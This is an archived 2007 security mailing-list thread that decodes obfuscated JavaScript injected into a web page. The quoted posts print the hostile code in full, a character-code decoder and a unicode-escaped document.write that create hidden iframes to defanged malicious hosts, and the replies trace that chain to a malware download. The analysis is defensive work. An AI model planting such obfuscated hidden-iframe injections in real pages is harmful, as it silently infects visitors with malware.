[Dshield] Need help decoding hackers javascript code

Security security at hudakville.com
Thu Sep 6 17:52:05 GMT 2007


In this particular case, the end goal of the zlo-x.net/XDS/iframe.php
is to download and install a piece of malware from
hxxp://oya.ru/vyhod/numizmat/ima/get.php?file=exe.  The file that gets
downloaded, update.exe is UPX-packed and is known to most AV as
Goldun.  The following link should let you see the VT results:

http://www.virustotal.com/resultado.html?e308317d18761b82d81c41c1f7902d53

Of course, along the way it branches out into other sites which try to
download and install their own goodies.

Tyler

Dave Hatz wrote:
> For those of us out here who are not as security savvy as some of the
> experts on this list, what is the hacker trying to accomplish with this
> page?
> 
> Dave Hatz 
> 
> -----Original Message-----
> From: list-bounces at lists.dshield.org [mailto:list-bounces at lists.dshield.org]
> On Behalf Of Chris Wright
> Sent: Tuesday, September 04, 2007 1:24 PM
> To: 'General DShield Discussion List'
> Subject: Re: [Dshield] Need help decoding hackers javascript code
> 
> 
> And just to save everyone else from having to decode it:
> 
> First block is:
> 
> <iframe width=1 height=1 border=0 frameborder=0
> src='hXXp://bensax.info/index2.html'></iframe> 
> 
>> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
>> <!--
>> function Decode(){var temp="",i,c=0,out="";var
>> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32
>> !104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48
>> !32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114
>> !99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!10
>> 5!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!
>> 62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(
> c<=str.length-1){while(str.charAt(c)!='!')>
> temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp
>> );temp="";}document.write(out);}
> 
> Second block is:
> 
> <iframe src="hXXp://zlo-x.net/XDS/iframe.php" width=0 height=0
> border=0></iframe>
> 
> 
>> </SCRIPT>
>> <meta name="revisit-after" content="1 days" /><script
>> type="text/javascript">document.write('\u003c\u0069\u0066\u007
>> 2\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\
>> u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0
>> 078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u006
>> 9\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\
>> u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0
>> 065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u007
>> 2\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\
>> u0072\u0061\u006d\u0065\u003e')</script>
>>
> 
> _________________________________________
> SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS top
> instructors, and a great tools and solutions expo. Register today!
> http://www.sans.org/info/4651 (brochure code ISC)
> 
> _________________________________________
> SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS top
> instructors, and a great tools and solutions expo. Register today!
> http://www.sans.org/info/4651 (brochure code ISC)
> 
> 
> 


More information about the list mailing list